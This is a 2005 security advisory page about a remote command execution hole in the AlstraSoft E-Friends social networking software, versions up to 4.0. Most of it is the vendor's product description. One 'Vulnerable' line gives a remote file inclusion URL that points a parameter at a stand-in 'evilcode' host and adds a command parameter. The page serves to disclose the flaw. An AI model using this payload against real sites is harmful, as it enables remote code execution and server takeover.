|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | AlstraSoft E-Friends Remote Command Exucetion
|
SecurityAlert : 22
CVE : CVE-2005-3062
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : khc
Published : 24.09.2005
Affected Software : | AlstraSoft E-Friends x<=4.0 |
 Advisory Content : AlstraSoft E-Friends Remote command exucetion
Site : http://www.alstrasoft.com/efriends.htm
Description :
AlstraSoft E-Friends is an online social networking software that allows
you to start your own site just like Friendster and Tribe.net. The
E-Friends software allows members to connect to people in their personal
networks and community, creating a new online interactive resource that is
based on a trusted network of friends and associates on the internet.
Members can use this abundant network to make friends, find their love
ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish
much more with the help of groups and individuals who they know and share
the same interests.
With our new 4.0 release, you can now start a profitable social networking
business by creating custom membership packages using Paypal payment
gateway. In addition, we have added several new exciting features including
online blog, forums, text-based chat, events and many more! Enhancements
are also added to the admin backend and with our integrated banner ads
system, you can earn extra income by publishing paid banner ads on your
E-Friends site.
Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd=
Solution : no :P
Contact : khc (at) bsdmail (dot) org [email concealed]
Kurdish Hackers Clan!
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|